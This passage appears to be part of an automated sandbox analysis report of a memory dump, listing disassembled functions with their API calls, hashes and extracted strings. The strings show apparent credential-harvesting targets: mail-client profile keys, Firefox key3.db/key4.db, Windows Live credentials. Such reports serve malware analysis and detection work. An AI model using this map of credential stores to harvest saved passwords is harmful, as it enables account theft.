                                                                                                                                                  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                • String ID: $$d
                                                                                                                                                • API String ID: 2915808112-2066904009
                                                                                                                                                • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                • strchr.MSVCRT ref: 0040326D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                  • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                  • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2432066023-0
                                                                                                                                                • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                • memset.MSVCRT ref: 0040F396
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                                                • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                  • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                • strchr.MSVCRT ref: 00403711
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                • strlen.MSVCRT ref: 0040376A
                                                                                                                                                • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                • API String ID: 500647785-4097000612
                                                                                                                                                • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00409239
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                • memset.MSVCRT ref: 0040927D
                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                  • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                  • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                  • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                  • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2485852401-0
                                                                                                                                                • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                • String ID: C@$key3.db$key4.db
                                                                                                                                                • API String ID: 581844971-2841947474
                                                                                                                                                • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2126104762-0
                                                                                                                                                • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                • String ID: user_pref("
                                                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                                                • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                • memset.MSVCRT ref: 004058AF
                                                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                                                • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                  • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                Strings
                                                                                                                                                • strings, xrefs: 00408B98
                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                • API String ID: 4036804644-4125592482
                                                                                                                                                • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00407E84
                                                                                                                                                  • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                  • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,764BE430,?), ref: 00407F2F
                                                                                                                                                  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
